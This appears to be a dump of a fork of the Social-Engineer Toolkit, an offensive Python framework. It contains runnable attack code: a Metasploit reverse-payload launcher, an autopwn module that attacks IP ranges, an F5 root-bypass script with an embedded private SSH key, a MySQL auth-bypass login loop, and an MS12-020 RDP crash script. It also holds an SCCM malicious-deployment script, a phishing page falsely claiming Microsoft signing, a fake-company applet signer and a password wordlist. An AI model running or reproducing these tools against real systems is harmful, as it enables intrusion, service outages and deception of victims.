24 | payload=(raw_input(setprompt(["4"], ""))) 25 | # if its default then select meterpreter 26 | if payload == "" : payload="2" 27 | # assign the right payload 28 | payload=ms_payload(payload) 29 | lhost=raw_input(setprompt(["4"], "IP address for the payload listener (LHOST)")) 30 | port = raw_input(setprompt(["4"], "Enter the PORT for the reverse listener")) 31 | # print to user that payload is being generated 32 | print_status("Generating the payload.. please be patient.") 33 | # generate the actual payload 34 | payload_generate(payload,lhost,port) 35 | 36 | # check options to see if we are using the infectious media generator 37 | if check_options("INFECTION_MEDIA=") != "ON": 38 | # start the payload for the user 39 | payload_query = raw_input(setprompt(["4"], "Do you want to start the payload and listener now? 
(yes/no)")) 40 | if payload_query.lower() == "y" or payload_query.lower() == "yes": 41 | print_status("Launching msfconsole, this could take a few to load. Be patient...") 42 | subprocess.Popen(meta_path + "msfconsole -r " + setdir + "/meta_config", shell=True).wait() 43 | -------------------------------------------------------------------------------- /src/core/reports/files/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/reports/files/logo.png -------------------------------------------------------------------------------- /src/core/reports/files/main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/reports/files/main.png -------------------------------------------------------------------------------- /src/core/reports/files/rss.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/reports/files/rss.png -------------------------------------------------------------------------------- /src/core/reports/files/tweet.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/reports/files/tweet.png -------------------------------------------------------------------------------- /src/core/ssl/PoC_SSL.py: 
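#!/usr/bin/env python
import socket, os
from SocketServer import BaseServer
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from OpenSSL import SSL


class SecureHTTPServer(HTTPServer):
    """HTTPServer whose listening socket is wrapped in a pyOpenSSL connection."""

    def __init__(self, server_address, HandlerClass):
        """Build the TLS context, wrap the listening socket, bind and listen.

        server_address -- (host, port) tuple handed to BaseServer
        HandlerClass   -- request handler class used for each connection
        """
        # BaseServer.__init__ is called directly rather than
        # HTTPServer.__init__; presumably so that the only socket ever bound
        # is the TLS-wrapped one assigned below.
        BaseServer.__init__(self, server_address, HandlerClass)
        ctx = SSL.Context(SSL.SSLv23_METHOD)
        # SSLv23_METHOD negotiates whatever protocol both peers support, so
        # the obsolete SSLv2/SSLv3 have to be switched off explicitly.
        ctx.set_options(SSL.OP_NO_SSLv2 | SSL.OP_NO_SSLv3)
        # Location of the server private key and the server certificate.
        # Both paths are relative to the current working directory.
        fpem_priv = 'newreq.pem'   # server private key
        fpem_cert = 'newcert.pem'  # server certificate
        ctx.use_privatekey_file(fpem_priv)
        ctx.use_certificate_file(fpem_cert)
        # Fail at start-up, not on the first handshake, when the key does not
        # belong to the certificate.
        ctx.check_privatekey()
        self.socket = SSL.Connection(ctx, socket.socket(self.address_family,
                                                        self.socket_type))
        self.server_bind()
        self.server_activate()

    def shutdown_request(self, request):
        """Shut down *request* through the connection's own shutdown()."""
        # Called without the `how` argument that a plain socket.shutdown()
        # expects.
        request.shutdown()


class SecureHTTPRequestHandler(SimpleHTTPRequestHandler):
    """SimpleHTTPRequestHandler that reads and writes over the TLS connection."""

    def setup(self):
        """Create rfile/wfile on top of the SSL connection object."""
        # socket._fileobject is a private Python 2 helper; it replaces the
        # stock setup(), presumably because SSL.Connection offers no usable
        # makefile().
        self.connection = self.request
        self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
        self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)


def main_server(HandlerClass = SecureHTTPRequestHandler,
                ServerClass = SecureHTTPServer):
    """Create the HTTPS server on port 443 and print the bound address.

    HandlerClass -- request handler class passed to the server
    ServerClass  -- server class to instantiate
    """
    # '' binds every local interface, not just loopback.
    server_address = ('', 443)  # (address, port)
    httpd = ServerClass(server_address, HandlerClass)
    sa = httpd.socket.getsockname()
    print "Serving HTTPS on", sa[0], "port", sa[1], "..."
    # NOTE(review): no serve_forever()/handle_request() call follows, so as
    # written this function returns without handling a request; confirm that
    # this is intended.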
39 | 40 | if __name__ == '__main__': 41 | main_server() 42 | -------------------------------------------------------------------------------- /src/core/ssl/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/ssl/__init__.py -------------------------------------------------------------------------------- /src/core/ssl/setssl.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # Quick SSL Cert creation method 4 | # 5 | # Used if you want to create self signed 6 | 7 | from src.core.setcore import * 8 | import subprocess,os 9 | definepath=os.getcwd() 10 | os.chdir(setdir) 11 | # create the directories for us 12 | subprocess.Popen("mkdir CA;cd CA;mkdir newcerts private", shell=True).wait() 13 | # move into CA directory 14 | os.chdir("CA/") 15 | # create necessary files 16 | subprocess.Popen("echo '01' > serial;touch index.txt", shell=True).wait() 17 | filewrite=file("openssl.cnf", "w") 18 | filewrite.write("""# 19 | # OpenSSL configuration file. 20 | # 21 | 22 | # Establish working directory. 23 | dir = . 
24 | [ req ] 25 | default_bits = 1024 # Size of keys 26 | default_keyfile = key.pem # name of generated keys 27 | default_md = md5 # message digest algorithm 28 | string_mask = nombstr # permitted characters 29 | distinguished_name = req_distinguished_name 30 | 31 | [ req_distinguished_name ] 32 | # Variable name Prompt string 33 | #---------------------- ---------------------------------- 34 | 0.organizationName = Organization Name (company) 35 | organizationalUnitName = Organizational Unit Name (department, division) 36 | emailAddress = Email Address 37 | emailAddress_max = 40 38 | localityName = Locality Name (city, district) 39 | stateOrProvinceName = State or Province Name (full name) 40 | countryName = Country Name (2 letter code) 41 | countryName_min = 2 42 | countryName_max = 2 43 | commonName = Common Name (hostname, IP, or your name) 44 | commonName_max = 64 45 | 46 | # Default values for the above, for consistency and less typing. 47 | # Variable name Value 48 | #------------------------------ ------------------------------ 49 | 0.organizationName_default = The Sample Company 50 | localityName_default = Metropolis 51 | stateOrProvinceName_default = New York 52 | countryName_default = US 53 | 54 | [ v3_ca ] 55 | basicConstraints = CA:TRUE 56 | subjectKeyIdentifier = hash 57 | authorityKeyIdentifier = keyid:always,issuer:always""") 58 | # close editing of the file 59 | filewrite.close() 60 | subprocess.Popen("openssl req -new -x509 -extensions v3_ca -keyout private/cakey.pem -out newcert.pem -days 3650 -config ./openssl.cnf", shell=True).wait() 61 | subprocess.Popen("cp private/cakey.pem newreq.pem;cp *.pem ../", shell=True).wait() 62 | os.chdir(definepath) 63 | -------------------------------------------------------------------------------- /src/core/webserver.py: -------------------------------------------------------------------------------- 1 | import SimpleHTTPServer 2 | import BaseHTTPServer 3 | import httplib 4 | import os 5 | import sys 6 | from 
src.core.setcore import * 7 | 8 | # specify the web port 9 | web_port = check_config("WEB_PORT=") 10 | 11 | class StoppableHttpRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): 12 | """http request handler with QUIT stopping the server""" 13 | 14 | def do_QUIT(self): 15 | """send 200 OK response, and set server.stop to True""" 16 | self.send_response(200) 17 | self.end_headers() 18 | self.server.stop = True 19 | 20 | def do_POST(self): 21 | # We could also process paremeters here using something like below. 22 | self.do_GET() 23 | 24 | def send_head(self): 25 | # This is ripped directly from SimpleHTTPRequestHandler, only the cookie part is added. 26 | """Common code for GET and HEAD commands. 27 | 28 | This sends the response code and MIME headers. 29 | 30 | Return value is either a file object (which has to be copied 31 | to the outputfile by the caller unless the command was HEAD, 32 | and must be closed by the caller under all circumstances), or 33 | None, in which case the caller has nothing further to do. 
34 | 35 | """ 36 | path = self.translate_path(self.path) 37 | f = None 38 | if os.path.isdir(path): 39 | if not self.path.endswith('/'): 40 | # redirect browser - doing basically what apache does 41 | self.send_response(301) 42 | self.send_header("Location", self.path + "/") 43 | self.end_headers() 44 | return None 45 | for index in "index.html", "index.htm": 46 | index = os.path.join(path, index) 47 | if os.path.exists(index): 48 | path = index 49 | break 50 | else: 51 | return self.list_directory(path) 52 | ctype = self.guess_type(path) 53 | if ctype.startswith('text/'): 54 | mode = 'r' 55 | else: 56 | mode = 'rb' 57 | try: 58 | f = open(path, mode) 59 | except IOError: 60 | self.send_error(404, "File not found") 61 | return None 62 | self.send_response(200) 63 | self.send_header("Content-type", ctype) 64 | fs = os.fstat(f.fileno()) 65 | self.send_header("Content-Length", str(fs[6])) 66 | self.send_header("Last-Modified", self.date_time_string(fs.st_mtime)) 67 | self.end_headers() 68 | return f 69 | 70 | class StoppableHttpServer(BaseHTTPServer.HTTPServer): 71 | """http server that reacts to self.stop flag""" 72 | 73 | def serve_forever(self): 74 | """Handle one request at a time until stopped.""" 75 | self.stop = False 76 | while not self.stop: 77 | self.handle_request() 78 | 79 | # stop the http server 80 | def stop_server(web_port): 81 | web_port = int(web_port) 82 | """send QUIT request to http server running on localhost:""" 83 | conn = httplib.HTTPConnection("localhost:%d" % web_port) 84 | conn.request("QUIT", "/") 85 | conn.getresponse() 86 | 87 | # start the http server 88 | def start_server(web_port, path): 89 | os.chdir(path) 90 | web_port = int(web_port) 91 | server = StoppableHttpServer(('', web_port), StoppableHttpRequestHandler) 92 | server.serve_forever() 93 | -------------------------------------------------------------------------------- /src/dev-notes/TODO: -------------------------------------------------------------------------------- 1 | 
rel1k: 2 | 3 | - add ability to read in port number and IP address (ie. ip:1433) 4 | 5 | j0fer: 6 | Add configuration option in set_config to specify sendmail location. Currently hard coded. 7 | -------------------------------------------------------------------------------- /src/dev-notes/html_color.txt: -------------------------------------------------------------------------------- 1 | 0193d0 2 | font: century gothic 3 | -------------------------------------------------------------------------------- /src/fasttrack/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/fasttrack/__init__.py -------------------------------------------------------------------------------- /src/fasttrack/autopwn.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # 4 | # Metasploit Autopwn functionality 5 | # 6 | # 7 | from src.core import setcore 8 | import pexpect 9 | 10 | 11 | # this will load the database 12 | def prep(database, ranges): 13 | print "\n" 14 | setcore.PrintStatus("Prepping the answer file based on what was specified.") 15 | # prep the file to be written 16 | filewrite=file("src/program_junk/autopwn.answer", "w") 17 | setcore.PrintStatus("Using the " + database + "sql driver for autopwn") 18 | filewrite.write("db_driver " + database + "\r\n") 19 | setcore.PrintStatus("Autopwn will attack the following systems: " + ranges) 20 | filewrite.write("db_nmap " + ranges + "\r\n") 21 | filewrite.write("db_autopwn -p -t -e -r\r\n") 22 | filewrite.write("jobs -K\r\n") 23 | filewrite.write("sessions -l\r\n") 24 | filewrite.close() 25 | setcore.PrintStatus("Answer file has been created and prepped for delivery into Metasploit.\n") 26 | 27 | 28 | def launch(): 29 | """ here we cant use the path for metasploit 
via setcore.meta_path. If the full path is specified it breaks 30 | database support for msfconsole for some reason. reported this as a bug, may be fixed soon... until then 31 | if path variables aren't set for msfconsole this will break, even if its specified in set_config """ 32 | 33 | # launch the attack 34 | setcore.PrintStatus("Launching Metasploit and attacking the systems specified. This may take a moment..") 35 | # try/catch block 36 | try: 37 | child = pexpect.spawn("%msfconsole -r %s/autopwn.answer\r\n\r\n" % (meta_path,setdir)) 38 | child.interact() 39 | 40 | # handle exceptions and log them 41 | except Exception, error: setcore.log(error) 42 | 43 | 44 | def do_autopwn(): 45 | print 'Doing do_autopwn' 46 | # pull the metasploit database 47 | database = setcore.meta_database() 48 | range = raw_input(setcore.setprompt(["19","20"], "Enter the IP ranges to attack (nmap syntax only)")) 49 | 50 | # prep the answer file 51 | prep(database, range) 52 | confirm_attack = raw_input(setcore.setprompt(["19","20"], "You are about to attack systems are you sure [y/n]")) 53 | 54 | # if we are sure, then lets do it 55 | if confirm_attack == "yes" or confirm_attack == "y": 56 | launch() 57 | -------------------------------------------------------------------------------- /src/fasttrack/exploits/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/fasttrack/exploits/__init__.py -------------------------------------------------------------------------------- /src/fasttrack/exploits/f5.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py) 4 | # 5 | # Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass 6 | # 
http://www.trustedsec.com 7 | # 8 | # 9 | import subprocess,os 10 | 11 | filewrite = file("priv.key", "w") 12 | filewrite.write("""-----BEGIN RSA PRIVATE KEY----- 13 | MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh 14 | UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk 15 | OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB 16 | gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF 17 | 8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv 18 | 7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM 19 | 2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s 20 | 37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL 21 | RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4 22 | rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/ 23 | uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU 24 | Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G 25 | LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS 26 | -----END RSA PRIVATE KEY-----""") 27 | filewrite.close() 28 | subprocess.Popen("chmod 700 priv.key", shell=True).wait() 29 | print """ 30 | Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py) 31 | 32 | Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass 33 | http://www.trustedsec.com 34 | """ 35 | ipaddr=raw_input("Enter the IP address of the F5: ") 36 | subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait() 37 | 38 | if os.path.isfile("priv.key"): 39 | os.remove("priv.key") 40 | -------------------------------------------------------------------------------- /src/fasttrack/exploits/mysql_bypass.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # 4 | # This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little. 
5 | # 6 | # Title: MySQL Remote Root Authentication Bypass 7 | # Written by: Dave Kennedy (ReL1K) 8 | # http://www.trustedsec.com 9 | # 10 | # Original advisory here: seclists.org/oss-sec/2012/q2/493 11 | # 12 | import subprocess 13 | 14 | print """ 15 | This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little. 16 | 17 | Title: MySQL Remote Root Authentication Bypass 18 | Written by: Dave Kennedy (ReL1K) 19 | http://www.trustedsec.com 20 | 21 | Original advisory here: seclists.org/oss-sec/2012/q2/493 22 | 23 | Note, you will see a number of failed login attempts, after about 300, if it doesn't 24 | work, then its not vulnerable. 25 | """ 26 | ipaddr = raw_input("Enter the IP address of the mysql server: ") 27 | 28 | while 1: 29 | subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait() 30 | -------------------------------------------------------------------------------- /src/fasttrack/exploits/rdpdos.py: -------------------------------------------------------------------------------- 1 | # Exploit Title: Pakyu Cenloder 2 | # Date: March 16 2012 3 | # Author: BMario 4 | # Application Link: Microsoft Terminal Services / Remote Desktop Services 5 | # http://msdn.microsoft.com/en-us/library/aa383015(v=vs.85).aspx 6 | # Version: any Windows version before 13 Mar 2012 7 | # Platforms: Windows 8 | # Bug: use after free 9 | # Exploitation: remote, versus server 10 | # Author: Stanley Marshall 11 | # Tested on: Windows 7 32bit 12 | # CVE : MS12-020 13 | 14 | import socket 15 | import sys 16 | 17 | print "Microsoft Terminal Services / Remote Desktop Services - Denial of Service" 18 | 19 | headpack = "030000130ee000000000000100080000000000".decode('hex') 20 | dafuq = 
"030001d602f0807f658201940401010401010101ff30190204000000000204000000020204000000000204000000010204000000000204000000010202ffff020400000002301902040000000102040000000102040000000102040000000102040000000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204000000010204000000000204000000010202ffff02040000000204820133000500147c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca03aa09040000ce0e000048004f005300540000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca010000000000100007000100300030003000300030002d003000300030002d0030003000300030003000300030002d003000300030003000300000000000000000000000000000000000000000000000000004c00c000d0000000000000002c00c001b0000000000000003c02c0003000000726470647200000000008080636c6970726472000000a0c0726470736e640000000000c0".decode('hex') 21 | dafree = "0300000802f08028".decode('hex') 22 | 23 | trololo = headpack+dafuq+dafree 24 | 25 | #HOSTNYO = sys.argv[1] 26 | HOSTNYO = raw_input("Enter the IP address to crash (remote desktop): ") 27 | PORTNYO = 3389 28 | for i in range(10240): 29 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 30 | s.connect((HOSTNYO,PORTNYO)) 31 | s.send(trololo) 32 | rec = s.recv(1024) 33 | s.close() 34 | -------------------------------------------------------------------------------- /src/fasttrack/sccm/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/fasttrack/sccm/__init__.py -------------------------------------------------------------------------------- /src/fasttrack/sccm/sccm_main.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from src.core.setcore import * 
3 | print "The" + bcolors.BOLD + " SCCM Attack Vector " + bcolors.ENDC + "will utilize the SCCM configurations to deploy malicious software. \n\nYou need to have the SMSServer name and a PackageID you want to package on the website. Then you need to copy this configuration file to the startup directory for all of the users on the server." 4 | 5 | sms_server = raw_input("Enter the IP address or hostname of the SMS Server: ") 6 | package_id = raw_input("Enter the Package ID of the package you want to patch: ") 7 | 8 | configuration = ''' 9 | # configuration file written by Dave DeSimone and Bill Readshaw 10 | # attack vector presented at Defcon 20 11 | # added to set 07/27/2012 12 | 13 | strSMSServer = "%s" 14 | strPackageID = "%s" 15 | 16 | Set objLoc = CreateObject("WbemScripting.SWbemLocator") 17 | Set objSMS= objLoc.ConnectServer(strSMSServer, "root\sms") 18 | Set Results = objSMS.ExecQuery _ 19 | ("SELECT * From SMS_ProviderLocation WHERE ProviderForLocalSite = true") 20 | For each Loc in Results 21 | If Loc.ProviderForLocalSite = True Then 22 | Set objSMS2 = objLoc.ConnectServer(Loc.Machine, "root\sms\site_"& _ 23 | Loc.SiteCode) 24 | strSMSSiteCode = Loc.SiteCode 25 | end if 26 | Next 27 | 28 | Set objPkgs = objSMS2.ExecQuery("select * from SMS_Package where PackageID = '" & strPackageID & "'") 29 | for each objPkg in objPkgs 30 | objPkg.RefreshPkgSource(0) 31 | Next 32 | ''' % (sms_server, package_id) 33 | 34 | # write out the file to reports 35 | filewrite = file(setdir + "/reports/sccm_configuration.txt", "w") 36 | filewrite.write(configuration) 37 | filewrite.close() 38 | print_status("The SCCM configuration script has been successfully created.") 39 | print_status("You need to copy the script to the startup folder of the server.") 40 | print_status("Report has been exported to %s/reports/sccm_configuration.txt" % (definepath)) 41 | pause = raw_input("Press " + bcolors.RED + "{return} " + bcolors.ENDC + "to exit this menu.") 42 | 
-------------------------------------------------------------------------------- /src/fasttrack/wordlist.txt: -------------------------------------------------------------------------------- 1 | P@55w0rd 2 | P@ssw0rd! 3 | P@55w0rd! 4 | sqlsqlsqlsql 5 | SQLSQLSQLSQL 6 | Welcome123 7 | Welcome1234 8 | Welcome1212 9 | PassSql12 10 | network 11 | networking 12 | networks 13 | test 14 | testtest 15 | testing 16 | testing123 17 | testsql 18 | test-sql3 19 | sqlsqlsqlsqlsql 20 | bankbank 21 | default 22 | test 23 | testing 24 | password2 25 | 26 | password 27 | Password1 28 | Password1! 29 | P@ssw0rd 30 | password12 31 | Password12 32 | security 33 | security1 34 | security3 35 | secuirty3 36 | complex1 37 | complex2 38 | complex3 39 | sqlserver 40 | sql 41 | sqlsql 42 | password1 43 | password123 44 | complexpassword 45 | database 46 | server 47 | changeme 48 | change 49 | sqlserver2000 50 | sqlserver2005 51 | Sqlserver 52 | SqlServer 53 | Password1 54 | Password2 55 | P@ssw0rd 56 | P@ssw0rd! 57 | P@55w0rd! 58 | P@ssword! 59 | Password! 60 | password! 61 | sqlsvr 62 | sqlaccount 63 | account 64 | sasa 65 | sa 66 | administator 67 | pass 68 | sql 69 | microsoft 70 | sqlserver 71 | sa 72 | hugs 73 | sasa 74 | welcome 75 | welcome1 76 | welcome2 77 | march2011 78 | sqlpass 79 | sqlpassword 80 | guessme 81 | bird 82 | P@55w0rd! 
83 | test 84 | dev 85 | qa 86 | god 87 | admin 88 | adminadmin 89 | admins 90 | goat 91 | sysadmin 92 | water 93 | dirt 94 | air 95 | earth 96 | company 97 | secret 98 | sqlpass123 99 | Summer2013 100 | Summer2012 101 | Summer2011 102 | Summer2010 103 | Summer2009 104 | Summer2008 105 | Winter2013 106 | Winter2012 107 | Winter2011 108 | Winter2010 109 | Winter2009 110 | Winter2008 111 | summer2013 112 | summer2012 113 | summer2011 114 | summer2010 115 | summer2009 116 | summer2008 117 | winter2013 118 | winter2012 119 | winter2011 120 | winter2010 121 | winter2009 122 | winter2008 123 | 123456 124 | abcd123 125 | abc 126 | burp 127 | private 128 | unknown 129 | wicked 130 | alpine 131 | trust 132 | microsoft 133 | sql2000 134 | sql2003 135 | sql2005 136 | sql2008 137 | vista 138 | xp 139 | nt 140 | 98 141 | 95 142 | 2003 143 | 2008 144 | someday 145 | sql2010 146 | sql2011 147 | sql2009 148 | complex 149 | goat 150 | changelater 151 | rain 152 | fire 153 | snow 154 | -------------------------------------------------------------------------------- /src/html/Signed_Update.jar.orig: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/html/Signed_Update.jar.orig -------------------------------------------------------------------------------- /src/html/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/html/__init__.py -------------------------------------------------------------------------------- /src/html/fasttrack_http_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os 3 | import sys 4 | 
definepath=os.getcwd() 5 | sys.path.append(definepath) 6 | from src.core.setcore import * 7 | start_web_server_unthreaded(setdir + "/web_clone/") 8 | -------------------------------------------------------------------------------- /src/html/templates/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/html/templates/__init__.py -------------------------------------------------------------------------------- /src/html/templates/java/index.template: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Java Required 6 | 7 | 8 | 9 | 10 | 11 | 12 | 25 | 26 | 27 | 28 | 29 | 30 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 76 | 77 | 78 |
  13 | 14 | 15 | 16 | 23 | 24 |
Java Required! 17 |
18 | Search the website
19 | 20 | 21 |
22 |
 
  31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 |  
 

Welcome to the website, you must hava Java in order to view this page properly. Ensure that the Microsoft signed Java box that pops up is accepted to load the site content.


 
  49 | 50 | 51 | 62 | 63 |
Welcome to the site! This site requires Java in order to run properly. Words from our CEO "Java Required to view content."
52 |
53 | 54 | Instructions to view the website:

55 | 56 | 1. A pop-up box will prompt, please hit "Yes". This may take a few moments.
57 | 2. This pop-up is signed through the Microsoft Corporation and will provide you with necessary updates to view the site.
58 | 3. Once you have accepted, wait about 10 to 15 seconds and the page will load.
59 | 60 | You must first click "Run" for the signed Java component from Microsoft in order to view our site successfully. 61 |





64 |
 
 
You must first click "Run" for the signed Java component from Microsoft in order to view our site successfully. Java is a well trusted and industry used component for websites.
 
  
79 | 80 | 81 | -------------------------------------------------------------------------------- /src/html/templates/template.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import os 4 | import shutil 5 | import glob 6 | from src.core.setcore import * 7 | 8 | me = mod_name() 9 | dest = "src/html/" 10 | 11 | debug_msg(me,"entering src.html.templates.template'",1) 12 | 13 | # 14 | # used for pre-defined templates 15 | # 16 | print """ 17 | 1. Java Required 18 | 2. Google 19 | 3. Facebook 20 | 4. Twitter 21 | 5. Yahoo 22 | """ 23 | choice=raw_input(setprompt(["2"],"Select a template")) 24 | 25 | if choice == "exit": 26 | exit_set() 27 | 28 | # file used for nextpage in java applet attack 29 | filewrite=file(setdir + "/site.template", "w") 30 | 31 | # if nothing is selected 32 | if choice == "": choice = "1" 33 | 34 | # if java required 35 | if choice == "1": 36 | if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template") 37 | shutil.copyfile("src/html/templates/java/index.template", "src/html/index.template") 38 | URL="" 39 | 40 | # if google 41 | if choice == "2": 42 | if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template") 43 | shutil.copyfile("src/html/templates/google/index.template", "src/html/index.template") 44 | URL="http://www.google.com" 45 | 46 | # if facebook 47 | if choice == "3": 48 | if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template") 49 | for files in glob.glob('src/html/templates/facebook/*.*'): shutil.copy(files, "src/html/") 50 | URL="http://www.facebook.com" 51 | 52 | # if twitter 53 | if choice == "4": 54 | if os.path.isfile("src/html/index.template"): 55 | os.remove("src/html/index.template") 56 | shutil.copyfile("src/html/templates/twitter/index.template", "src/html/index.template") 57 | URL="http://www.twitter.com" 58 | 59 | # if yahoo 60 | if choice =="5": 61 | if 
os.path.isfile("src/html/index.template"): os.remove("src/html/index.template") 62 | shutil.copyfile("src/html/templates/yahoo/index.template", "src/html/index.template") 63 | URL="http://mail.yahoo.com" 64 | 65 | if not os.path.isdir(setdir + "/web_clone"): 66 | os.makedirs(setdir + "/web_clone/") 67 | if os.path.isfile(setdir + "/web_clone/index.html"): os.remove(setdir + "/web_clone/index.html") 68 | shutil.copyfile("src/html/index.template", setdir + "/web_clone/index.html") 69 | filewrite.write("TEMPLATE=SELF" + "\n"+"URL=%s" % (URL)) 70 | filewrite.close() 71 | 72 | debug_msg(me,"exiting src.html.templates.template'",1) 73 | -------------------------------------------------------------------------------- /src/html/unsigned/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/html/unsigned/__init__.py -------------------------------------------------------------------------------- /src/html/unsigned/self_sign.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import subprocess 4 | import os 5 | import sys 6 | from src.core.setcore import * 7 | 8 | ######################### 9 | # Simple signer for signing the java applet attack 10 | ######################### 11 | 12 | # create Key: keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass 13 | # sign: jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar SignedMicrosoft.jar oMicrosoft.jar signapplet 14 | 15 | os.chdir("src/html/unsigned") 16 | 17 | print """ 18 | Simply enter in the required fields, easy example below: 19 | 20 | Name: FakeCompany 21 | Organization: Fake Company 22 | Organization Name: Fake Company 23 | City: Cleveland 24 | State: Ohio 25 | Country: US 26 | Is 
